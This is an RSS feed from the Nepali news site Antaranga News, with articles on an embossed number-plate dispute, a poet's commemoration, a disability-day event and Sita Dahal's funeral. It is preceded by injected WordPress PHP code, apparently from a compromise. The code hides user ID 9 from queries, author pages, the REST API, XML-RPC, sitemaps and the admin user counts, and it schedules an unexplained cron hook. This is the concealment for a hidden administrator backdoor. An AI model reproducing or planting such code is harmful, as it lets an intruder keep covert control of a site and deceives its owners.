add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
भलाकुसारी – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
News from Gandaki ProvinceTue, 26 Aug 2025 06:47:17 +0000en-US
hourly
1 https://wordpress.org/?v=7.0.2https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpgभलाकुसारी – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
3232इम्बोस्ड नम्बर प्लेट अनिवार्य गर्ने सरकारी निर्देशन विरुद्ध सार्वजनिक यातायात महासंघको आह्वान
https://www.antaranganews.com/?p=34697
https://www.antaranganews.com/?p=34697#respondTue, 26 Aug 2025 06:46:25 +0000https://www.antaranganews.com/?p=34697काठमाडौँ– सार्वजनिक यातायात केन्द्रीय महासंघ, नेपालले यातायातका साधनहरूमा इम्बोस्ड नम्बर प्लेट जडान फर्ने सरकारी निर्देशनको अवज्ञा गरेको छ । हिजो भदौ ९ गते एक विज्ञप्ति जारी गर्दै महासंघले त्यस्तो जानकारी दिएको हो ।
राष्ट्रको सुरक्षामा खतरा उत्पन्न हुने तर्क गर्र्दै महासंघले पूर्वाधारबिना विदेशी प्रविधि भिर्त्याएर नागरिक र यातायात व्यवसायीमाथि अनावश्यक आर्थिक भार थपिने र यसले नेपालीको व्यक्तिगत विवरण विदेशी कम्पनीको नियन्त्रणमा रहने हुँदा सो कार्य नगर्न विज्ञप्तिमा भनिएको छ । जबरजस्ती इम्बोस्ड नम्बर प्लेट जडान गराउन खोजिए आन्दोलन गर्ने महासंघले चेतावनी दिएको छ ।
महासंघद्वारा जारी विज्ञप्तिमा भनिएको छ, ‘सरकार, प्रत्यक्ष सरोकारहरू पक्षहरूबीचको छलफल संंवादका बीच देखिएका अव्यवहारिक विषयहरूको संशोधन सुधार बिना सार्वजनिक, पर्यटन र ढुवानी, निजी प्राइभेट सम्पूर्ण यातायात क्षेत्रको तर्फबाट सो इम्वोस्ड नम्बर प्लेट जडा नगर्नु हुन सबैमा हार्दिक अनुरोध छ ।’
सो विज्ञप्तिमा ‘जबरजस्ती रुपमा प्लेट जडान गर्न खोजिए परिस्थिति उपज हुने विरोध दबाबका थप गतिविधिप्रति स्वयं यातायात मन्त्रालय मातहत निकायहरु नै जवाफदेही हुने व्यहोरा यसै विज्ञप्तिमार्फत सबैमा जानकारी गराइन्छ,’ उल्लेख छ ।
भौतिक पूर्वाधार तथा यातायात मन्त्रालयअन्तर्गतको यातायात व्यवस्था विभागले भदौ ३ गते सूचना जारी गरी असोज १ गतेदेखि सवारीसाधनमा इम्बोस्ड नम्बर प्लेट अनिवार्य गर्ने जनाएको थियो ।
२०७३ जेठ १७ गते नेपाल सरकार, भौतिक पूर्वाधार तथा यातायात मन्त्रालय, यातायात व्यवस्था विभाग र डेकाटुर टाइगर आइटी कम्पनी (अमेरिकी र बंगलादेशी संयुक्त कम्पनी)बीच पाँच वर्षभित्र २५ लाख इम्बोस्ड नम्बर प्लेट बनाएर नेपाल सरकारलाई हस्तान्तरण गर्ने सम्झौता भएको थियो । सोही सम्झौतासँगै सरकारले सवारी साधनहरूमा इम्बोस्ड नम्बर प्लेट जडान गरिसक्ने लक्ष्य राखेको थियो । प्लेटमा प्रदेशको नाम नेपालीमा, अंक अंग्रेजीमा :
पटक–पटक समय सार्दै २०८० मंसिर १२ गतेसम्म २५ लाख सवारी साधनमा अनिवार्य इम्बोस्ड नम्बर प्लेट जडान गर्नुपर्ने भनिएको छ । तर, यो समय भित्र पनि पूरा हुनेमा भने शंका छ । ढिलाइ हुनुको प्रमुख कारणमध्ये भाषा विवाद एक हो। तर, भोतिक पूर्वाधार तथा यातायात मन्त्रालय यो विवाद सुल्झेको दाबी गरेको छ ।
आब २०७२÷७३ मा सुरु गरिएको यो नंबर प्लेट राख्ने योजना त्यो बोलमा भाषा विदको कारणले रोकिएको थियो । आर्थिक भार समेत बढी पर्ने भन्दै यसको विरोध भएको थियो ।
भौतिक पूर्वाधार मन्त्रालयका सह–सचिव ई. अर्जुन थापाका अनुसार प्रदेशको नाम नेपाली र अंक अंग्रेजीमा राख्रुने गरी सुल्झाइएको छ । तर, अझै समधान भएको मान्दैनन् यातायात व्यवस्था विभागका कर्मचारी । पाँच वर्षभित्र २५ लाख इम्बोस्ड नम्बर प्लेट जडान गर्ने भन्दै नेपाल सरकार र डेकाटुर टाइगर आइटी कम्पनीबीच सम्झौता भएको करिब सात वर्ष बितिसक्दा पनि काम पूरा हुन सकेको छैन । तर सरकारले विभिन्न कारण देखाउँदै काम पुरा गर्न सकेको छैन । तोकिएको पाँच वर्षको अवधि २०७८ भदौमै सकिएको थियो । काम नसकिएपछि सरकारले साढे दुई वर्षको लागि समय थप गरेर सम्झौता नवीकरण गरेको छ ।
सबै सवारीमा अनिवार्य नभई नयाँ दर्ता, नामसारी गरिने सवारीका लागि इम्बोस्ड नम्बर जडान गर्न भनिएको भन्दै विभागले आफ्नो सूचना हेरफेर गरेको थियो । इम्बोस्ड नम्बर प्लेट राख्न कति लाग्छ ?
अहिलेको नम्बर प्लेट बदलेर इम्बोस्ड प्लेट राख्न छुट्टै दस्तुर तिर्नुपर्ने छ । मन्त्रालय अन्तर्गतको कमिटीको सिफारिस अनुसार मोटरसाइकल तथा स्कुटर धनीले इम्बोस्ड नम्बर प्लेट जडान गर्दा २ हजार ५ सय रुपैयाँ खर्च गर्नु पर्नेछ ।
यसैगरी कार, जीप, भ्यान तथा ट्र्याक्टरले ३ हजार २ सय र सबै प्रकारका ठूला सवारी साधनले इम्बोस्ड नम्बर जडान गर्दा ३ हजार ६ सय रुपैयाँ शुल्क तिर्नुपर्ने सिफारिस गरिएको छ ।
नवीकरण गरिएको सम्झौता अनुसार २०८० मंसिर १२ गतेसम्म २५ लाख सवारी साधनमा अनिवार्य इम्बोस्ड नम्बर प्लेट जडान गर्नुपर्ने भनिएको छ । तर सरकारको यो लक्ष्य यसपटक पनि पूरा नहुने देखिन्छ ।
सरकारले डेकाटुर कम्पनीसँग सम्झौता गर्दा इम्बोस्ड नम्बर प्लेटको लागि चार करोड ३७ लाख अमेरिकी डलर बुझाउने सम्झौता भएको विभागका महानिर्देशक भट्टराईले समयमा काम सकिनेगरी गृहकार्य गरिरहेको बताउनु हुन्छ ।
हाल नेपालमा ३७ लाख सवारी साधन दर्ता भएका छन् । सरकारले सवारी साधन ट्र्याकिङ र सुरक्षाका लागि भन्दै नेपालमा इम्बोस्ड नम्बर प्लेट प्रणाली सुरू गरेको हो ।
]]>
https://www.antaranganews.com/?feed=rss2&p=346970वेदान्त शिरोमणि कविवर डिल्लीजङ गुरुङको व्यक्तित्व र कीर्तित्वलाई उठाउन प्रतिष्ठान र पुस्तकालय खोल्नु पर्छ : डा. जगमान गुरुङ
https://www.antaranganews.com/?p=23245
https://www.antaranganews.com/?p=23245#respondSun, 24 Mar 2024 09:03:04 +0000https://www.antaranganews.com/?p=23245घनपोखरा(लमजुङ)– नेपाली भाषा, साहित्य एवम् संस्कृतिका लागि आफ्नो जीवन समर्पण गरेर क्रियाशील रहदै आउनु भएका नेपाल प्रज्ञा प्रतिष्ठानका निवर्तमान उपकुलपति डा. जगमान गुरुङले वेदान्त शिरोमणि कविवर डिल्लीजङ गुरुङको व्यक्तित्व र कीर्तित्वलाई बचाउन र उठाउन उहाँका नाउँमा प्रतिष्ठान र पुस्तकालय खोल्नु पर्नेमा जोड दिनुभएको छ । ठाडोभाका लोककला प्रतिष्ठान नेपालले यहाँ आयोजना गरेको खुला राष्ट्रव्यापी कविता प्रतियोगिता एवम् कवि गोष्ठीको उदघाटन गर्दै उहाँले चैत १० गते त्यस्तो बताउनु भएको हो ।
उहाँले घनपोखरा लमजुङ तेस्रो आँखा भएको बताउँदै पहिलो आँखा दुराडाँडा र दोस्रो आँखा चितिमा रहेका बाहुनहरू ङार्रर ङुर्रर गर्दा पनि के हो बाहुन बाजेहरू ? भने पनि उनीहरू चुप बस्ने गरेको हुँदा जहिले पनि घनपोखराले मध्यस्थ र मध्यमार्र्गी बाटो लिएको स्मरण गर्नुभयो ।
उहाँले वेदान्त शिरोमणि कविवर डिल्लीजङ गुरुङको व्यक्तित्व र कीर्तित्वका बारेमा उहाँको गर्भावस्थादेखि मृत्यु पर्यन्तका विशेष घट्नाहरू सविस्तार उल्लेख गर्नु भएको थियो । कविवर डिल्लीजङका पिता उहाँ गर्भमै छँदा वित्नु भएको थियो त्यसैले यहाँलाई ‘गर्भे सुब्बा’ पनि भनिन्थ्यो । उहाँले कविवर गुरुङ टुहुरो हुनुमा पनि दाजु– भाइ बिनाको माइती शून्य हुने भएको र माइती बिनाको चलीको आफू हुन हुन्न भन्ने धारणाले उहाँकी दिदीले आफ्ना पिता ८० वर्षको हुँदा बिवाह गरिदिएर गर्भ रहेको हुनाले हो भन्नुभयो । कविवरको जन्म पछि उहाँको शिक्षादीक्षाको कार्य त्यतिबेला गाउँहरूमा स्कूल नभएका कारणले लमजुङकै चिसंकुका नारायणदत्त घिमिरेलाई घरमै राखेर उहाँलाई पढाउने काम भएको जानकारी दिनुभयो । उहाँले कविवरका दाजु नरजङ वेमातृ पट्टीको भएता पनि उहाँले त्यस्तो कुनै फरक क्लेस देखाउनु भएन र नेपाल समाजमा ‘बाबुको शेषपछि दाजु’ भन्ने भनाइलाई व्यवहारमै प्रयोग गरेर बाबुको भूमिका निभाउनु भएको थियो भन्ने उल्लेख गर्नु भयो ।
जन्मदा केही व्यक्तिको राजग्रह परेको हुन्छ । त्यसमध्येका एक हुनुहुन्थ्यो कविवर डिल्लीजङ भन्दै उहाँले राष्ट्रकविलाई कविता लेख्न सिकाउनुका साथै राष्ट्रकविको पहिलो कृति समेत उहाँले प्रकाशन गरिदिनु भएको थियो । जो आफूसँग आज पनि सुरक्षित छ भन्नुभयो । कविवरले कपिल गीताको भावानुवाद गर्नु भएको छ र जतिपनि उहाँका कृतिहरू छन्– सबै वेदान्त प्रकृति परक छन् त्यसो भएको हुनाले उहाँ वेदान्त शिरोमणि हुनुभएको हो भन्नुभयो । यस प्रकार नेपाली भाषा, साहित्य, सेवा तथा विकासका कार्यमा समेत उत्तिकै रुचि राख्ने र काम समेत गर्ने बानी वेदान्त शिरोमणि कविवर डिल्लीजङ गुरुङको थियो । यस्ता व्यक्तिको अमरत्वका लागि उहाँका नाउँमा प्रतिष्ठान र पुस्तकालय सञ्चालन गर्नु पर्छ र त्यो कार्य गर्न कविवरको परिवारजनहरू सक्षम समेत छन् भन्ने दोहोर्याउँदै उहाँले जोड दिनुभयो ।
उक्त कार्यक्रममा गण्डकी प्रदेश सभाका सदस्य भेषबहादुर पौडेलले एकदेश र अर्को देशको बीचमा रहेका हामी मानिसहरूका आ–आफ्नै भाषा, भेषभुषा, संस्कार संस्कृति छन् । ती हाम्रा पहिचान हुन् र हामीलाई पहिचान गराउने भएको हुँदा नै यी विषयवस्तुको महत्व छ जो हाम्रो कला संस्कृति हो र संरक्षण गर्नु पर्छ भन्नुभयो । यहाँ राज्यसँग गुनासो, आक्रोस, पीडा पोखिए र सँगै आशा पनि केहीले व्यक्त गर्नु भएको छ । यो कार्यक्रमले नयाँ सन्देश दिने र उर्जा थप्ने काम गरेको छ उहाँले भन्नुभयो । उहाँले स्वार्थबस गरेको काम व्यापार हो र स्वार्थभन्दा माथि उठेर गरिने काम सेवा हो भन्नुहुँदै देशमा विकृति बढ्नुमा नेतामात्र हैन हामी पनि दोषि छौं उहाँले भन्नुभयो । आफ्नो ठाउँमा आफू ठीक भएर काम गर्ने हो भने विस्तारै सबै ठीक हु्न्छ भन्दै समाजको परिवर्तनमा स्रष्टाहरूको योगदान रहेको छ त्यसको सम्मान हुनुपर्छ भन्ने मेरो धारणा छ भन्नुभयो ।
मर्स्याङदी गाउँपालिकाका अध्यक्ष अर्जुन गुरुङले आज कविवरको सालिक अनावरण गर्ने जुन ऐतिहासिक काम भएको छ, यसले उहाँको योगदानलाई थप उजिल्याउने र चिनाउने काम गर्नेछ भन्नुभयो । उहाँले कविवर आफैले हिजोका दिनमा र उहाँका परिवारजनबाट वडा कार्यालय भवन लगायतका स्थानका लागि जग्गा दान गरी विकासको अभियानमा सहकार्य गरिएको स्मरण गर्नुभयो । उहाँले मर्स्याङदी गाउँपालिकामा गर्व गर्न लायकका थुप्रै विभूति भएको बताउँदै भक्ति थापा, हर्क गुरुङ, राष्ट्रकवि, कवि मेदिनी सुवेदी लगायतका थुप्रै विभूति भएको उहाँले कविवर डिल्लीजङले गुरुङको छोरा भएर पनि नेपाली साहित्यमा गर्नु भएको योगदान उच्च कोटीको रहेछ हामी सधैं सम्मान गर्दछौं उहाँले भन्नुभयो । उहाँले ठाडोभाका प्रतिष्ठानसँग सहकार्य गरिरहेको र भोलिका दिनमा पनि यो क्रम जारी रहने छ भन्नुभयो ।
यसैगरी, क्ब्होलासोथर गाउँपालिकाका अध्यक्ष सूर्यप्रसाद गुरुङले कविवर डिल्लीजङका बारेमा थोरै सुनेकोमा आज धेरै जान्ने अवसर मिल्यो भन्नुभयो । उहाँले ठाडोभाका गाउन सजिलो छैन तर पनि यसको संरक्षण गर्न जरुरी छ हाम्रो गाउँपालिकाले पनि यसका लागि सहकार्य गरिरहेको छ भन्नुभयो । यस्ता कार्यहरूलाई निरन्तरता दिन जरुरी छ उहाँले भन्नुभयो ।
यसैगरी, नेपाली काँग्रेसका गण्डकी प्रदेशका संगठन विभाग प्रमुख हरिप्रसाद बरालले आफू धेरै पटक घनपोखरामा आएको भएता पनि कविका बारेमा आजजस्तो जानकारी पाउन नसकेको बताउँदै भाषा, सहित्य कलाको संरक्षण गर्नु पर्छ भन्नुभयो । अर्को एक प्रसङ्गमा राजनीतिलाई शुद्धिकरणको खाँचो छ तर यही संविधानको परिधिमा रहेको त्यो कार्य गर्नु पर्छ भन्नुभयो ।
उक्त कार्यक्रममा राप्रपाका जिल्ला उपाध्यक्ष ठाकुरप्रसाद गुरुङ, अनेसासको नेपाल च्याप्टरका अध्यक्ष राजेन्द्र केसी, डा. जीवन अधिकारी, सहप्रा. ज्ञाननिष्ट ज्ञवाली, अनेसास नेपाल च्याप्टरका निवर्तमान महासचिव ऋषभदेव घिमिरे, वरिष्ठ मुक्तककार दिव्य गिरि, मुक्ताकार मीना चौलागाई, अनुपम सिर्जना प्रतिष्ठान नेपाल कलंकीका उपाध्यक्ष जगदिश्वर पोखरेल लगायतले शुभकामना मन्तव्य सहित आआफ्ना रचना वाचन गर्नु भएको थियो । सो अवसरमा अढाई दर्जन बढी कविहरुले रचना वाचन गर्नु भएको थियो ।
वेदान्त शिरोमणि कविवर डिल्लीजङ गुरुङका कान्छा छोरा मेजर गोपाल गुरुङको अध्यक्षतामा भएको कार्यक्रममा उहाँले धन्यवाद मन्तव्य समेत व्यक्त गर्नु भएको थियो भने ठाडोभाका लोककला प्रतिष्ठान नेपालका अध्यक्ष नवराज पहाडीले सञ्चालन तथा उपाध्यक्ष शोभा थापाले स्वागत गर्नु भएको थियो ।
दुई दिने उक्त कार्यक्रममा अघिल्लो दिन साँझ ठाडोभाकाको विशेष प्रस्तुति रहेको थियो । उक्त अवसरमा ठाडोभाकाका उदियमान गायकहरु सावित्री शाही र नवीन बराल, अमरध्वज गुरुङ र देउकुमारी गुरुङ, आश विक र भुन्टीमाया तामाङ, अमरध्जज गुरुङ र बुद्धिमाया गुरुङ तथा आश विक र काशीमाया तामाङले ठाडोभाका प्रस्तुत गर्नु भएको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=232450३२ औं अन्तराष्ट्रिय अपाङ्ग दिवसमा भव्य कार्यक्रम
https://www.antaranganews.com/?p=20966
https://www.antaranganews.com/?p=20966#respondSun, 03 Dec 2023 12:38:56 +0000https://www.antaranganews.com/?p=20966लमजुङ– ३२ औं अन्तराष्ट्रिय अपाङ्ग दिवसमा भव्य कार्यक्रमका साथ जिल्ला सदरमुकाम बेसीशहरमा मनाइएको छ । सो अवसरमा राइनास नगरपालिकाको महिला, बाललिका तथा जेष्ठ नागरिक शाखाकी प्रमुख सीता गैह्रेलाई सम्मान मंसिर १९ गते सम्मान गरेको छ ।
३२ औं अन्तराष्ट्यि अपाङ्ग दिवसका अवसरमा जिल्लामा अपाङ्गका क्षेत्रका काम गर्न स्थापित पहिलो संस्था ‘अपाङ्ग संरक्षण समाज’ले उहाँलाई यहाँ आयोजित सो दिवसको विशेष कार्यक्रमका अवसरमा सीताले स्थानीय तहको सामाजिक विकास शाखामार्फत अपाङ्गताका क्षेत्रमा सबैभन्दा उत्कृष्ठ कार्य गरेको हुँदा सम्मान गरिएको अपाङ्ग संरक्षण समाजका अध्यक्ष एवम् कार्यक्रमका अध्यक्ष चन्द्रकान्त पौडेलले बताउनु भयो । उहाँका अनुसार सीताले यतिबेला स्थानीय तहमा मात्र हैन हिजोका दिनमा जिल्ला सदरमुकाममा महिला विकास कार्यालय हुँदा पनि अपाङ्गता भएका व्यक्तिको हक, अधिकार दिलाउन र हितका लागि विशेष योगदान गर्नु भएको थियो । पौडेलले भन्नुभयो, ‘त्यसैले उहाँको कार्यको उच्च मूल्यांकन एवम् कदर गर्दै सम्मान गरिएको हो ।’
सो कार्यक्रम बेसीशहर नगरपालिकाका उपमेयर पदमा गुरुङको प्रमुख आतिथ्यता तथा प्रजिअ रामकृष्ण अधिकारीको विशेष आतिथ्यतामा भएको हो ।
उपमेयर गुरुङले प्रविधि र साधनको सुविधा खोज्ने जमाना छ हिजोआज । हामी बेसीशहरको सेरा, नारायणस्थान वा भीमसेन स्थानबाट मनाङे चौतारामा जानु पर्दा पनि साधान खोज्छौं तर उहाँहरुलाई कति कठिन होला आफ्नो जीवन गुजार गर्न ? सम्झना पनि झसङ्ग हुन्छ भन्नुभयो । उहाँले शरिरका सबै अंगको उत्तिकै महत्व छ भन्दै सबैलाई पहेलो वा निलो कार्ड दिन सकिएको छैन, हामी पनि नियम कानुनमा बाँधिनु पर्छ भन्ने जानकारी दिनुभयो । तर पनि नगरपालिकाले गत वर्षबाट पहेलो कार्ड हुनेहरूलाई राहत स्वरुप पाँच सय रुपैयाँ भने पनि दिने गरिएको स्मरण गर्नु भयो ।
उहाँले आर्थिक सहयोग माग्न आउनु हुनेहरूलाई ५– १० हजार रुपैयाँ दिनुभन्दा स्वास्थ्य बीमा गरिदियो भने एकलाखको उपचार खर्च पाउने हुँदा प्रति परिवार ३५ सय खर्चेर कार्यविधि नै बनाएर सो कार्य गरेको उपमेयर गुरुङले जानकारी दिनुभयो ।
यसैगरी, प्रमुख जिल्ला अधिकारी रामकृष्ण अधिकारीले आजको दिनमा यो क्षेत्रका सबैको अधिकारको लडाइँमा ऐक्यवद्धता व्यक्त गर्दछु भन्नुभयो । उहाँले अपाङ्गता समस्या हैन कठिनाई हो भनिएको छ । उहाँले जिल्लाका दुर्गमक्षेत्रमा गएर अपाङ्गता परिचयपत्र वितरले त्यो मर्मलाई अन्तराष्ट्यिस्तरमै प्रतिवद्धताका साथ कठिनाई कम गर्ने दिशामा अघि बढ्नु पर्छ भन्नुभयो ।
राष्ट्रिय रुपमै तीन प्रतिशत जनसंख्या भएजस्तै लमजुङमा पनि त्यो संख्या केन्द्रकै हाराहारी रहेको छ । यसमा सहजिकरणका लागि सरकारको दायित्व के कति कसरी कार्यान्वयन भएको छ समीक्षाको विषय हुन सक्छ, क्षमता अनुसार राज्यले सामाजिक सुरक्षा प्रदान गरेको समरण गर्नु भयो । अपाङ्ग संरक्षण समाज जिल्लामै पहिलो संस्था :
उक्त कार्यक्रममा सम्मानित भएपछि सीता गैह्रेले जिल्लास्तरमा अपाङ्ग अधिकारका क्षेत्रमा आवाज उठाउने पहिलो संस्था अपाङ्ग संरक्षण समाज भएको बताउँदै जिल्लामा अपाङ्गता परिचय पत्र वितरण गर्नु पर्ने भ्रन्दै दबाब दिने संस्था पनि यही हो, आफूले त कर्मचारीको नाताले सहयोग मात्र गरेको बताउनु भयो ।ण गर्ने काममा समेत समाजका अध्यक्ष चन्द्रकान्त पौडेलको ठूलो योगदान रहेको स्मरण गर्दै बैसाखी टेकेर कष्टकर बाटो गिलुङ दूधपोखरी आदिमा जाँदा बैसाखी चिप्लेर पौडेल लडेरको आफूहरुले उठाउँदै सहयोग गरेर सहकार्य गरेको उल्लेख गर्नुभयो । उहाँले यो संस्थाले युगौयुगसम्म जीवित रहेर त्यसरीनै योगदान गरिरहोस् भन्ने सुभेच्छा समेत व्यक्त गर्नुभयो ।
सो अवसरमा बेसीशहर नगरपालिकाका प्रमुख प्रशासकीय अधिकृत चेतनाथ अर्याल, वडानं– २ का अध्यक्ष मदन राना, विभिन्न दलका प्रमुख तथा प्रतिनिधिहरूले शुभकामना व्यक्त गरेका थिए ।
ग्रामीण अपाङ्ग समाज, लमजुङका अध्यक्ष प्रकाश चिलुवालले स्वागत गर्नु भएको कार्यक्रमको सञ्चालन नेत्रहीन संघका जिल्ला अध्यक्ष राजेन्द्र घिमिरेबाट भएको थियो ।
सो अवसरमा बेसीशहर नगरस्तरीय अपाङ्गता सञ्जाल गठन गरिएको छ । सञ्जालको अध्यक्ष सिताराम बसेल, उपाध्यक्ष कमला परियार, सचिव मुनिन्द्र थापा, कोषाध्यक्ष सविता केसी चयन हुनुभएको छ । साथै सदस्यमा देवीजङ गुरुङ, राम श्रेष्ठ, चन्द्रमाया परिवार, पूर्णबहादुर दुलाल, शंकर परियार, तोकबहादुर बलाकोटी र गोमा थापा हुनुहुन्छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=209660प्रधानमन्त्री राजकीय सम्मानसहित सीता दाहालको पशुपतिमा अन्त्येष्टि सुरु, श्रीमान्सहित दुई छोरीद्वारा दागवत्ती
https://www.antaranganews.com/?p=16868
https://www.antaranganews.com/?p=16868#respondWed, 12 Jul 2023 09:52:41 +0000https://www.antaranganews.com/?p=16868काठमाडौं– प्रचण्ड’की पत्नी सीता दाहालको अन्तिम विदाई गरिएको छ । सीताको पार्थिव शरीरमा प्रधानमन्त्री तथा सीता दाहालका श्रीमान् प्रचण्डसहित दुई छोरीले दागबत्ती दिनु भयो । प्रधानमन्त्री एवम् नेकपा माओवादी केन्द्रका अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’की पत्नी सीता दाहाललाई ‘राजकीय’सम्मानका साथ अन्तिम बिदाई गरिने भएको छ । आज बिहान बसेको मन्त्रिपरिषद्को आकस्मिक बैठकले असार २७ गते त्यस्तो निर्णय गरेको हो ।
दाहाललाई राजकीय सम्मानका साथ बिदाई गरिने सरकारका प्रवक्ता रेखा शर्माले बताउनु भयो । उहाँका अनुसार बैठकले दिवङ्गत दाहालको अन्त्येष्टिको समयमा राजकीय सम्मान स्वरुप नेपाली सेनाको टुकडीले अन्तिम सलामी दिने व्यवस्था मिलाउने निर्णय भएको छ । दाहालको ६९ वर्षको उमेरमा आज बिहान असामयिक निधन भएकोप्रति आकस्मिक बैठकले गहिरो शोक प्रकट गर्दै हार्दिक श्रद्धाञ्जली व्यक्त गरेको छ ।
प्रधानमन्त्री पुष्पकमल दाहाल ‘प्रचण्ड’ पत्नी सीता दाहालको शव पशुपति आर्यघाट लगिएको छ ।
प्रधानमन्त्री प्रचण्डलाई समवेदना दिन राजनीतिक दलका शीर्ष नेता, सरकारी अधिकारीहरू पेरिसडाँडा पुगेका थिए ।
प्रधानमन्त्री पत्नी सीतालाई अन्तिम श्रद्धाञ्जली दिन उच्चपदस्थ सरकारी अधिकारी, सुरक्षा निकायका अधिकारीहरू र माओवादी केन्द्रका समर्थक तथा शुभेच्छुकहरू पशुपति आर्यघाट पुगेका छन् ।
सीताको शव श्रद्धाञ्जलीका लागि ११ बजेदेखि माओवादी केन्द्रको पार्टी कार्यालय पेरिसडाँडामा राखिएको थियो ।
दुर्लभ र जटिल प्रकारको नसासम्बन्धी रोगबाट गुज्रिएकी सीता दुई वर्षयता प्रतिक्रिया विहीन हुनुहुन्थ्यो ।
२०७४ साल मंसिरमा छोरा प्रकाशको निधन भए यता उहाँ खासै होस््मा आउन सक्नु भएको थिएन । प्रधानमन्त्री प्रचण्ड पत्नी सीतालाई पछिल्लो समय पेटमा पाइप राखेर खाना दिइँदै आएको उहाँको उचारमा संलग्न प्राध्यापक डाक्टर युवराज शर्माले बताउनु भयो । उहाँका अनुसार प्रधानमन्त्री पत्नी सीतालाई सास फेर्न कठिन भएपछि नर्भिक अस्पताल ल्याइएको थियो । सीता दाहाललाई श्रद्धाञ्जली, प्रचण्डको आँखामा थामिएन आँसु :
यसैबीच, नेकपा (माओवादी केन्द्र)का अध्यक्ष एबं प्रधानमन्त्री पुष्पकमल दाहाल ‘प्रचण्ड’का धर्मपत्नी एवं पार्टी सल्लाहकार सदस्य सीता दाहालको पार्थिव शरीर श्रद्धाञ्जलीका लागि पार्टी कार्यालय पेरिसडाँडाको कार्यालय प्राङ्गणमा आयोजित शोकसभामा उहाँको पार्थिव शरीरमा प्रधानमन्त्री प्रचण्डले पुष्पहार अर्पण गर्दै श्रद्धाञ्जली व्यक्त गर्नु भएको छ । उहाँको पार्थिव शरिरमा प्रधानमन्त्री दाहालले पार्टीको झण्डासमेत ओढाउँदै गर्दा उहाँका आँखाबाट आसु झरिरहेको प्रष्टै देखिन्थ्यो ।
उपस्थितहरूले श्रद्धाञ्जली अपर्ण गर्दै एक मिनेट मौन धारणा गरेका थिए ।
शोकसभामा नेकपा (माओवादी केन्द्र)का वरिष्ठ उपाध्यक्ष एवं उपप्रधानमन्त्री तथा गृहमन्त्री नारायणकाजी श्रेष्ठ, पूर्वउपराष्ट्रपति नन्दबहादुर पुन, नेकपा(एकीकृत समाजवादी)का सम्मानित नेता तथा पूर्वप्रधानमन्त्री झलनाथ खनाल, पूर्वसभामुख अग्नि सापकोटा, मन्त्रिपरिषद्का पूर्वअध्यक्ष खिलराज रेग्मी, नेपालका लागि चिनियाँ राजदूत छनसोङलगायतले श्रद्धाञ्जली अपर्ण गरेका छन् । भारतीय प्रधानमन्त्री मोदीबाट दुःख व्यक्त :
उता भारतीय प्रधानमन्त्री नरेन्द्र मोदीले प्रधानमन्त्री पुष्पकमल दाहाल ‘प्रचण्ड’ की पत्नी सीता दाहालको मृत्युप्रति दुःख व्यक्त गर्दै सीता दाहालको मृत्युले आफू मर्माहत भएको बताउनु भएको छ । प्रधानमन्त्री मोदीले ट्विट गर्दै त्यस्तो उल्लेख गर्नु भएको हो ।
मोदीले प्रचण्डप्रति हार्दिक सम्वेदना व्यक्त गर्दै भनेका छन्, ‘श्रीमती सीता दाहालको दुःखद निधन भएको खबरले मर्माहत भएको छु । प्रचण्डप्रति हार्दिक समवेदना प्रकट गर्दै दिवंगत आत्मालाई चिरशान्ति मिलोस् भनी प्रार्थना गर्दछु ।’
प्रधानमन्त्री मोदीले नेपाली र अंग्रेजी दुबै भाषाबाट संवेदना व्यक्त गर्नु भएको छ । पूर्वराजा ज्ञानेन्द्र शाहद्वारा सीता दाहालप्रति श्रद्धाञ्जली :
